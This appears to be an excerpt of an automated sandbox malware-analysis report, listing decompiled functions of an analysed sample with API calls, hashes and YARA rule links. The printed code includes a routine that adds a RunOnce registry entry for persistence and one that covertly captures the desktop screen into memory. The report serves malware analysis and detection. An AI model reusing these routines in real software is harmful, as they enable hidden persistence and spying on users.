                                                                                                                        Function 6F336A90, Relevance: 49.2, APIs: 21, Strings: 7, Instructions: 224memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E6F336A90(CHAR* _a4, intOrPtr _a8) {
				void _v264;
				char _v266;
				char _v267;
				char _v268;
				char _v271;
				char _v272;
				char _v273;
				char _v274;
				short _v275;
				char _v276;
				void* _t53;
				CHAR* _t55;
				CHAR* _t56;
				int _t57;
				CHAR* _t59;
				CHAR* _t60;
				CHAR* _t62;
				int _t66;
				CHAR* _t70;
				CHAR* _t72;
				CHAR* _t73;
				int _t74;
				CHAR* _t75;
				CHAR* _t76;
				CHAR* _t78;
				CHAR* _t80;
				char _t81;
				void* _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				char _t97;
				CHAR* _t103;
				CHAR* _t104;
				CHAR* _t105;
				int _t108;
				CHAR* _t110;
				CHAR* _t113;
				CHAR* _t121;
				CHAR* _t122;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t132;
				int _t133;
				int _t135;
				CHAR* _t139;

				_t139 = _a4;
				if(_t139 != 0) {
					_t88 = _t139[4];
					if(_t88 != 0) {
						HeapFree(GetProcessHeap(), 0, _t88);
					}
					_t53 = _t139[8];
					if(_t53 != 0) {
						_t53 = HeapFree(GetProcessHeap(), 0, _t53);
					}
				}
				if(_a8 != 0) {
					return _t53;
				} else {
					if(_t139 == 0) {
						_t86 = M6F3404CC; // 0xa32d38
						_t132 = M6F3404DC; // 0xa55ca8
						_v268 = 0x67;
						_v267 = 0x64;
						_v266 = 0;
						WritePrivateProfileStringA(_t132,  &_v268, _t139, _t86);
					}
					_v275 = 0x64;
					asm("sbb bl, bl");
					_t97 = ( ~_t139 & 0x000000f5) + 0x6e;
					_v273 = 0;
					_v276 = 0x68;
					_v274 = _t97;
					E6F331D30(0x6f340034);
					_t55 = M6F3404CC; // 0xa32d38
					_t56 = M6F3404DC; // 0xa55ca8
					_t57 = GetPrivateProfileStringA(_t56,  &_v276, 0x6f340034,  &_v264, 0x104, _t55); // executed
					_t133 = _t57;
					E6F331D30(0x6f340034);
					if(_t139 == 0) {
						_t59 = M6F3404CC; // 0xa32d38
						_t60 = M6F3404DC; // 0xa55ca8
						_v274 = 0x63;
						WritePrivateProfileStringA(_t60,  &_v276,  &_v264, _t59);
						_t103 = M6F3404CC; // 0xa32d38
						_t62 = M6F3404DC; // 0xa55ca8
						_v274 = 0x6e;
						WritePrivateProfileStringA(_t62,  &_v276, 0, _t103);
					} else {
						_t15 = _t133 + 1; // 0x1
						_t85 = HeapAlloc(GetProcessHeap(), 8, _t15);
						_t139[4] = _t85;
						RtlMoveMemory(_t85,  &_v264, _t133);
						 *_t139 = _t133;
					}
					_v275 = 0x70;
					_v274 = _t97;
					E6F331D30(0x6f340010);
					_t104 = M6F3404CC; // 0xa32d38
					_t105 = M6F3404DC; // 0xa55ca8
					_t66 = GetPrivateProfileStringA(_t105,  &_v276, 0x6f340010,  &_v264, 0x104, _t104); // executed
					_t135 = _t66;
					E6F331D30(0x6f340010);
					if(_t139 == 0) {
						_t121 = M6F3404CC; // 0xa32d38
						_t122 = M6F3404DC; // 0xa55ca8
						_v274 = 0x63;
						WritePrivateProfileStringA(_t122,  &_v276,  &_v264, _t121);
						_t70 = M6F3404CC; // 0xa32d38
						_t123 = M6F3404DC; // 0xa55ca8
						_v274 = 0x6e;
						WritePrivateProfileStringA(_t123,  &_v276, 0, _t70);
					} else {
						_t27 = _t135 + 1; // 0x1
						_t83 = HeapAlloc(GetProcessHeap(), 8, _t27);
						_t139[8] = _t83;
						RtlMoveMemory(_t83,  &_v264, _t135);
					}
					_t72 = M6F3404CC; // 0xa32d38
					_t108 =  *0x6f34000c; // 0x1
					_t73 = M6F3404DC; // 0xa55ca8
					_t124 =  &_v276;
					_v274 = _t97;
					_v275 = 0x73;
					_t74 = GetPrivateProfileIntA(_t73, _t124, _t108, _t72); // executed
					if(_t139 != 0) {
						_v275 = 0x74;
						_t139[0xc] = 0 | _t74 != 0x00000000;
						_t113 = M6F3404CC; // 0xa32d38
						_t80 = M6F3404DC; // 0xa55ca8
						_t81 = GetPrivateProfileIntA(_t80,  &_v276, 0xc, _t113); // executed
						_t139[0x10] = _t81;
						return _t81;
					}
					_t75 = M6F3404CC; // 0xa32d38
					_t76 = M6F3404DC; // 0xa55ca8
					_v272 = (_t124 & 0xffffff00 | _t74 == 0x00000001) + 0x30;
					_v271 = 0;
					_v274 = 0x63;
					WritePrivateProfileStringA(_t76,  &_v276,  &_v272, _t75);
					_t110 = M6F3404CC; // 0xa32d38
					_t78 = M6F3404DC; // 0xa55ca8
					_v274 = 0x6e;
					return WritePrivateProfileStringA(_t78,  &_v276, 0, _t110);
				}
			}

















































                                                                                                                        0x6f336a97
                                                                                                                        0x6f336aa1
                                                                                                                        0x6f336aa3
                                                                                                                        0x6f336aae
                                                                                                                        0x6f336aba
                                                                                                                        0x6f336aba
                                                                                                                        0x6f336abc
                                                                                                                        0x6f336ac1
                                                                                                                        0x6f336acd
                                                                                                                        0x6f336acd
                                                                                                                        0x6f336ac1
                                                                                                                        0x6f336ad7
                                                                                                                        0x6f336cee
                                                                                                                        0x6f336add
                                                                                                                        0x6f336ae2
                                                                                                                        0x6f336ae4
                                                                                                                        0x6f336ae9
                                                                                                                        0x6f336af7
                                                                                                                        0x6f336afc
                                                                                                                        0x6f336b00
                                                                                                                        0x6f336b05
                                                                                                                        0x6f336b05
                                                                                                                        0x6f336b0b
                                                                                                                        0x6f336b13
                                                                                                                        0x6f336b19
                                                                                                                        0x6f336b21
                                                                                                                        0x6f336b26
                                                                                                                        0x6f336b2b
                                                                                                                        0x6f336b2f
                                                                                                                        0x6f336b34
                                                                                                                        0x6f336b43
                                                                                                                        0x6f336b5d
                                                                                                                        0x6f336b64
                                                                                                                        0x6f336b66
                                                                                                                        0x6f336b70
                                                                                                                        0x6f336b98
                                                                                                                        0x6f336ba4
                                                                                                                        0x6f336bb4
                                                                                                                        0x6f336bb9
                                                                                                                        0x6f336bbb
                                                                                                                        0x6f336bc1
                                                                                                                        0x6f336bcf
                                                                                                                        0x6f336bd4
                                                                                                                        0x6f336b72
                                                                                                                        0x6f336b72
                                                                                                                        0x6f336b7f
                                                                                                                        0x6f336b8c
                                                                                                                        0x6f336b8f
                                                                                                                        0x6f336b94
                                                                                                                        0x6f336b94
                                                                                                                        0x6f336bdb
                                                                                                                        0x6f336be0
                                                                                                                        0x6f336be4
                                                                                                                        0x6f336be9
                                                                                                                        0x6f336bf3
                                                                                                                        0x6f336c0e
                                                                                                                        0x6f336c15
                                                                                                                        0x6f336c17
                                                                                                                        0x6f336c22
                                                                                                                        0x6f336c4e
                                                                                                                        0x6f336c5b
                                                                                                                        0x6f336c6c
                                                                                                                        0x6f336c71
                                                                                                                        0x6f336c73
                                                                                                                        0x6f336c78
                                                                                                                        0x6f336c87
                                                                                                                        0x6f336c8c
                                                                                                                        0x6f336c24
                                                                                                                        0x6f336c24
                                                                                                                        0x6f336c31
                                                                                                                        0x6f336c3e
                                                                                                                        0x6f336c41
                                                                                                                        0x6f336c46
                                                                                                                        0x6f336c8e
                                                                                                                        0x6f336c93
                                                                                                                        0x6f336c9a
                                                                                                                        0x6f336ca0
                                                                                                                        0x6f336ca5
                                                                                                                        0x6f336cb0
                                                                                                                        0x6f336cb5
                                                                                                                        0x6f336cb9
                                                                                                                        0x6f336cc6
                                                                                                                        0x6f336ccd
                                                                                                                        0x6f336cd0
                                                                                                                        0x6f336cd6
                                                                                                                        0x6f336ce0
                                                                                                                        0x6f336ce2
                                                                                                                        0x00000000
                                                                                                                        0x6f336ce5
                                                                                                                        0x6f336cf2
                                                                                                                        0x6f336cfb
                                                                                                                        0x6f336d07
                                                                                                                        0x6f336d12
                                                                                                                        0x6f336d17
                                                                                                                        0x6f336d1c
                                                                                                                        0x6f336d1e
                                                                                                                        0x6f336d24
                                                                                                                        0x6f336d32
                                                                                                                        0x6f336d42
                                                                                                                        0x6f336d42

                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000), ref: 6F336AB3
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F336ABA
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000001,00000000,00000000), ref: 6F336AC6
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F336ACD
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00A55CA8,?,?,00A32D38), ref: 6F336B05
                                                                                                                        • GetPrivateProfileStringA.KERNEL32(00A55CA8,?,6F340034,?,00000104,00A32D38), ref: 6F336B5D
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000001), ref: 6F336B78
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F336B7F
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 6F336B8F
                                                                                                                        • WritePrivateProfileStringA.KERNEL32 ref: 6F336BB9
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00A55CA8,?,00000000,00A32D38), ref: 6F336BD4
                                                                                                                        • GetPrivateProfileStringA.KERNEL32(00A55CA8,?,6F340010,?,00000104,00A32D38), ref: 6F336C0E
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000001), ref: 6F336C2A
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F336C31
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 6F336C41
                                                                                                                        • WritePrivateProfileStringA.KERNEL32 ref: 6F336C71
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00A55CA8,?,00000000,00A32D38), ref: 6F336C8C
                                                                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 6F336CB5
                                                                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 6F336CE0
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00A55CA8,?,?,00A32D38), ref: 6F336D1C
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00A55CA8,?,00000000,00A32D38), ref: 6F336D37
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: PrivateProfile$String$Heap$Write$Process$AllocFreeMemoryMove
                                                                                                                        • String ID: g$h$n$n$p$s$t
                                                                                                                        • API String ID: 1023576463-1140765434
                                                                                                                        • Opcode ID: 0cde5862f183b121c62cf92efa75a81c7e92221fb73e9a1897498a688dcb8c77
                                                                                                                        • Instruction ID: bec72dedb32c6849fc37aabeba5ee61e32b396e40ad84842c132cdbd07fd08d7
                                                                                                                        • Opcode Fuzzy Hash: 0cde5862f183b121c62cf92efa75a81c7e92221fb73e9a1897498a688dcb8c77
                                                                                                                        • Instruction Fuzzy Hash: 468192B2618782AFD700DB68C844E5BB7EDABAA714F04890CF59497380D675E91CCB72
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F334CA0, Relevance: 40.4, APIs: 19, Strings: 4, Instructions: 150memoryregistrystringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F334CA0(void* __eflags, intOrPtr _a12) {
				int _v252;
				char _v256;
				int _v260;
				int _v264;
				void* _v276;
				void* _v284;
				char _v288;
				intOrPtr _t25;
				void* _t26;
				long _t31;
				int _t34;
				long _t36;
				char* _t37;
				char* _t45;
				int _t49;
				int _t56;
				char* _t59;
				char* _t60;
				char* _t71;
				CHAR* _t73;
				void* _t74;
				CHAR* _t76;

				_t25 = M6F340588; // 0x7488d8
				_t26 = E6F33A2F0(_t25, 0, 0);
				_t74 = _t26;
				if(_t74 != 0) {
					_v288 = 0x4f6e7552;
					_v284 = 0x65636e;
					wsprintfA( &_v264, "%s\\%s", _t74,  &_v288);
					HeapFree(GetProcessHeap(), 0, _t74);
					_v284 = 0;
					_t31 = RegCreateKeyExA(0x80000001,  &_v256, 0, 0, 0, 0xf023f, 0,  &_v284, 0); // executed
					if(_t31 != 0) {
						L14:
						return _t31;
					}
					if(_a12 == 0) {
						_v264 = 0;
						_t73 = HeapAlloc(GetProcessHeap(), 8, 0x105);
						if(_t73 == 0) {
							L13:
							_t31 = RegCloseKey(_v284);
							goto L14;
						}
						_t59 = M6F340530; // 0xa32c28
						_t34 = wsprintfA(_t73, "\"%s\" f", _t59);
						_t60 = M6F34053C; // 0xa32c55
						_v252 = _t34;
						_v264 = 0;
						_v260 = 1;
						_t36 = RegQueryValueExA(_v276, _t60, 0,  &_v260, 0,  &_v264); // executed
						if(_t36 != 0) {
							L11:
							_t37 = M6F34053C; // 0xa32c55
							RegSetValueExA(_v276, _t37, 0, 1, _t73, _v252 + 1); // executed
							L12:
							HeapFree(GetProcessHeap(), 0, _t73);
							goto L13;
						}
						_t76 = HeapAlloc(GetProcessHeap(), 8, _v264 + 1);
						if(_t76 == 0) {
							goto L11;
						}
						_t45 = M6F34053C; // 0xa32c55
						if(RegQueryValueExA(_v276, _t45, 0,  &_v260, _t76,  &_v264) != 0) {
							L9:
							_t56 = _v256;
							L10:
							HeapFree(GetProcessHeap(), 0, _t76);
							if(_t56 != 0) {
								goto L12;
							}
							goto L11;
						}
						_t49 = lstrcmpiA(_t76, _t73);
						_t56 = 1;
						if(_t49 == 0) {
							goto L10;
						}
						goto L9;
					}
					_t71 = M6F34053C; // 0xa32c55
					RegDeleteValueA(_v284, _t71);
					goto L13;
				}
				return _t26;
			}

























                                                                                                                        0x6f334ca0
                                                                                                                        0x6f334cb2
                                                                                                                        0x6f334cb7
                                                                                                                        0x6f334cbe
                                                                                                                        0x6f334cdc
                                                                                                                        0x6f334ce4
                                                                                                                        0x6f334cec
                                                                                                                        0x6f334cfc
                                                                                                                        0x6f334d1b
                                                                                                                        0x6f334d1f
                                                                                                                        0x6f334d27
                                                                                                                        0x6f334e42
                                                                                                                        0x00000000
                                                                                                                        0x6f334e43
                                                                                                                        0x6f334d34
                                                                                                                        0x6f334d54
                                                                                                                        0x6f334d63
                                                                                                                        0x6f334d67
                                                                                                                        0x6f334e37
                                                                                                                        0x6f334e3c
                                                                                                                        0x00000000
                                                                                                                        0x6f334e3c
                                                                                                                        0x6f334d6d
                                                                                                                        0x6f334d7a
                                                                                                                        0x6f334d7c
                                                                                                                        0x6f334d96
                                                                                                                        0x6f334da3
                                                                                                                        0x6f334dab
                                                                                                                        0x6f334db3
                                                                                                                        0x6f334db7
                                                                                                                        0x6f334e0f
                                                                                                                        0x6f334e13
                                                                                                                        0x6f334e25
                                                                                                                        0x6f334e2b
                                                                                                                        0x6f334e31
                                                                                                                        0x00000000
                                                                                                                        0x6f334e31
                                                                                                                        0x6f334dc6
                                                                                                                        0x6f334dca
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f334dcc
                                                                                                                        0x6f334de8
                                                                                                                        0x6f334dfb
                                                                                                                        0x6f334dfb
                                                                                                                        0x6f334dff
                                                                                                                        0x6f334e05
                                                                                                                        0x6f334e0d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f334e0d
                                                                                                                        0x6f334dec
                                                                                                                        0x6f334df2
                                                                                                                        0x6f334df9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f334df9
                                                                                                                        0x6f334d36
                                                                                                                        0x6f334d42
                                                                                                                        0x00000000
                                                                                                                        0x6f334d42
                                                                                                                        0x6f334e4c

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F33A2F0: WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6F336F16,00A56660,00000001,0000009C), ref: 6F33A311
                                                                                                                          • Part of subcall function 6F33A2F0: GetProcessHeap.KERNEL32(00000008,00000001,?,00000000,?,00000000,6F336F16,00A56660,00000001,0000009C,00000000,00000034,?,?,?,6F3403A0), ref: 6F33A323
                                                                                                                          • Part of subcall function 6F33A2F0: HeapAlloc.KERNEL32(00000000,?,00000000,?,00000000,6F336F16,00A56660,00000001,0000009C,00000000,00000034,?,?,?,6F3403A0,0000009C), ref: 6F33A32A
                                                                                                                          • Part of subcall function 6F33A2F0: WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6F336F16,00A56660,00000001,0000009C), ref: 6F33A33E
                                                                                                                        • wsprintfA.USER32 ref: 6F334CEC
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?), ref: 6F334CF9
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F334CFC
                                                                                                                        • RegCreateKeyExA.KERNEL32(80000001,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 6F334D1F
                                                                                                                        • RegDeleteValueA.ADVAPI32(?,00A32C55), ref: 6F334D42
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000105), ref: 6F334D58
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F334D61
                                                                                                                        • wsprintfA.USER32 ref: 6F334D7A
                                                                                                                        • RegQueryValueExA.KERNEL32 ref: 6F334DB3
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 6F334DC1
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F334DC4
                                                                                                                        • RegQueryValueExA.ADVAPI32(00A32C55,00A32C55,00000000,?,00000000,?), ref: 6F334DE4
                                                                                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 6F334DEC
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F334E02
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F334E05
                                                                                                                        • RegSetValueExA.KERNEL32(00000000,00A32C55,00000000,00000001,00000000,?), ref: 6F334E25
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F334E2E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F334E31
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 6F334E3C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$Value$AllocFree$ByteCharMultiQueryWidewsprintf$CloseCreateDeletelstrcmpi
                                                                                                                        • String ID: "%s" f$%s\%s$RunO$nce
                                                                                                                        • API String ID: 5215680-3682672340
                                                                                                                        • Opcode ID: 4ee67e902b87192e15e7a7d3d7ff65f5d598896b9118ae86d8434ea793be3f45
                                                                                                                        • Instruction ID: 3f126947d0bee041aa488b919a6a471a3df25b4e8b0900cda6c68f3e89514c92
                                                                                                                        • Opcode Fuzzy Hash: 4ee67e902b87192e15e7a7d3d7ff65f5d598896b9118ae86d8434ea793be3f45
                                                                                                                        • Instruction Fuzzy Hash: 7D418DB2604745ABD720DB65DC88E6B7BBDFBCAB14F00450CF95497240EA72E815CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00555587, Relevance: 39.1, APIs: 20, Strings: 2, Instructions: 602fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __invoke_watson.LIBCMT ref: 005555D3
                                                                                                                        • __invoke_watson.LIBCMT ref: 005555EE
                                                                                                                        • CreateFileA.KERNEL32(00000080,?,00000080,0000000C,00000001,00000080,00000000,00000109,00000000,00000000), ref: 005557D7
                                                                                                                        • CreateFileA.KERNEL32(00000080,7FFFFFFF,00000001,0000000C,00000001,00000080,00000000), ref: 00555810
                                                                                                                        • GetLastError.KERNEL32 ref: 00555835
                                                                                                                        • __dosmaperr.LIBCMT ref: 0055583C
                                                                                                                        • GetFileType.KERNEL32(00000000), ref: 00555851
                                                                                                                        • GetLastError.KERNEL32 ref: 00555876
                                                                                                                        • __dosmaperr.LIBCMT ref: 0055587F
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00555888
                                                                                                                        • __chsize_nolock.LIBCMT ref: 0055596C
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00555AEB
                                                                                                                        • CreateFileA.KERNEL32(00000080,?,00000001,0000000C,00000003,00000080,00000000), ref: 00555B08
                                                                                                                        • GetLastError.KERNEL32 ref: 00555B17
                                                                                                                        • __dosmaperr.LIBCMT ref: 00555B1E
                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00555B51
                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00555B66
                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00555BD5
                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00555BE6
                                                                                                                        • __locking.LIBCMT ref: 00555C95
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: File__lseeki64_nolock$CreateErrorLast__dosmaperr$CloseHandle__invoke_watson$Type__chsize_nolock__locking
                                                                                                                        • String ID: @$H
                                                                                                                        • API String ID: 2633173609-104103126
                                                                                                                        • Opcode ID: 2c27b8cb70341abea63fcc677adf9feb52aeac845cc550d636e48cd5cfacba99
                                                                                                                        • Instruction ID: 9652718ff90b0db00d63801c5aa4fbaf9ffc5e1e948bc0f52c8ea69fe1652fba
                                                                                                                        • Opcode Fuzzy Hash: 2c27b8cb70341abea63fcc677adf9feb52aeac845cc550d636e48cd5cfacba99
                                                                                                                        • Instruction Fuzzy Hash: 6222F371800A4ADBDF218FA8CCB57AD7FB1FF41326F24062AE951972A1E7358D48CB51
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F3366E0, Relevance: 34.7, APIs: 23, Instructions: 239windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 59%
                                                                                                                        			E6F3366E0() {
				intOrPtr* _v140;
				void** _v144;
				struct tagRECT _v164;
				long _v168;
				struct HDC__* _v172;
				int _v180;
				int _v184;
				void _v188;
				int _v192;
				int _v196;
				struct tagCURSORINFO _v212;
				struct HDC__* _v216;
				intOrPtr _v224;
				intOrPtr _v228;
				struct HICON__* _v232;
				intOrPtr _v252;
				intOrPtr _v256;
				void* _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				struct HDC__* _v288;
				struct HDC__* _v304;
				long _v308;
				intOrPtr _v316;
				struct HDC__* _v320;
				intOrPtr _v324;
				struct HDC__* _t61;
				struct HDC__* _t62;
				int _t67;
				void* _t70;
				int _t75;
				void* _t82;
				intOrPtr _t91;
				int _t99;
				long _t101;
				int _t103;
				struct HWND__* _t136;
				void* _t137;
				int _t138;
				struct HDC__* _t139;
				intOrPtr _t140;
				int _t142;
				void* _t144;

				_v168 = 0;
				_t136 = GetDesktopWindow();
				_v164.left = _t136;
				_t61 = GetDC(_t136);
				_t139 = _t61;
				_v172 = _t139;
				if(_t139 != 0) {
					_t62 = CreateCompatibleDC(_t139);
					_v188 = _t62;
					if(_t62 != 0) {
						_push(0x10);
						_push( &(_v164.right));
						L6F33C2EE();
						GetWindowRect(_t136,  &_v164);
						_t103 = _v164.bottom;
						_t67 = _v164.right;
						_t99 = _t67;
						_t142 = _t103;
						_t137 = CreateCompatibleBitmap(_t139, _t67, _t103);
						_v212.hCursor = _t137;
						if(_t137 != 0) {
							_t70 = SelectObject(_v212.flags, _t137);
							if(_t70 != 0 && _t70 != 0xffffffff && BitBlt(_v216, _v184, _v180, _t99, _t142, _t139, 0, 0, 0x40cc0020) != 0) {
								_push(0x14);
								_push( &(_v212.hCursor));
								L6F33C2EE();
								_v212.cbSize = 0x14;
								_t75 = GetCursorInfo( &_v212);
								if(_t75 != 0 && _v212.flags == 1) {
									_push(0x14);
									_push( &_v192);
									L6F33C2EE();
									_t75 = GetIconInfo(_v212.cbSize,  &(_v212.ptScreenPos));
									if(_t75 != 0) {
										_push(0x18);
										_push( &_v180);
										L6F33C2EE();
										GetObjectA(_v192, 0x18,  &_v188);
										_t75 = DrawIconEx(_v288, _v228 - _v256 + _v256 - _v216, _v224 - _v252 + _v252 - _v212, _v232, _v196, _v192, 0, 0, 3);
									}
								}
								__imp__#12(0, 0);
								_t138 = _t75;
								if(_t138 != 0) {
									_push(_t138);
									_push(_t142);
									_push(_t99);
									_push( &_v264);
									if(E6F336480() != 0) {
										_push(0x48);
										_push( &(_v164.right));
										L6F33C2EE();
										_push(1);
										_push( &_v164);
										_push(_t138);
										if( *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0x30))))() >= 0) {
											_t101 = _v168;
											if(_t101 != 0) {
												_t82 = VirtualAlloc(0, _t101, 0x1000, 4); // executed
												_t144 = _t82;
												if(_t144 != 0) {
													_push(8);
													_push( &_v264);
													L6F33C2EE();
													_push(0);
													asm("xorpd xmm0, xmm0");
													asm("movlpd [esp+0x2c], xmm0");
													_push(0);
													_push(_v268);
													_push(_v272);
													_push(_t138);
													if( *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0x14))))() < 0) {
														L24:
														VirtualFree(_t144, 0, 0x8000);
													} else {
														_t140 = 0;
														if(_t101 == 0) {
															L23:
															_t139 = _v304;
															goto L24;
														} else {
															while(1) {
																_push( &_v308);
																_push(_t101 - _t140);
																_push(_t140 + _t144);
																_push(_t138);
																_v308 = 0;
																if( *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0xc))))() < 0) {
																	break;
																}
																_t91 = _v324;
																if(_t91 != 0) {
																	_t140 = _t140 + _t91;
																	if(_t140 < _t101) {
																		continue;
																	}
																}
																break;
															}
															if(_t140 == 0) {
																goto L23;
															} else {
																 *_v140 = _t140;
																_t139 = _v320;
																 *_v144 = _t144;
																_v316 = 1;
															}
														}
													}
												}
											}
										}
									}
									 *((intOrPtr*)( *((intOrPtr*)( *_t138 + 8))))(_t138); // executed
								}
								_t137 = _v264;
							}
							DeleteObject(_t137);
						}
						DeleteDC(_v212.flags);
						_t136 = _v192;
					}
					ReleaseDC(_t136, _t139);
					return _v172;
				} else {
					return _t61;
				}
			}














































                                                                                                                        0x6f3366e8
                                                                                                                        0x6f3366f6
                                                                                                                        0x6f3366f9
                                                                                                                        0x6f3366fd
                                                                                                                        0x6f336703
                                                                                                                        0x6f336705
                                                                                                                        0x6f33670b
                                                                                                                        0x6f336717
                                                                                                                        0x6f33671d
                                                                                                                        0x6f336723
                                                                                                                        0x6f33672b
                                                                                                                        0x6f336731
                                                                                                                        0x6f336732
                                                                                                                        0x6f33673d
                                                                                                                        0x6f336743
                                                                                                                        0x6f336747
                                                                                                                        0x6f33674e
                                                                                                                        0x6f336750
                                                                                                                        0x6f336758
                                                                                                                        0x6f33675a
                                                                                                                        0x6f336760
                                                                                                                        0x6f33676c
                                                                                                                        0x6f336774
                                                                                                                        0x6f3367ac
                                                                                                                        0x6f3367b2
                                                                                                                        0x6f3367b3
                                                                                                                        0x6f3367bd
                                                                                                                        0x6f3367c5
                                                                                                                        0x6f3367cd
                                                                                                                        0x6f3367de
                                                                                                                        0x6f3367e4
                                                                                                                        0x6f3367e5
                                                                                                                        0x6f3367f4
                                                                                                                        0x6f3367fc
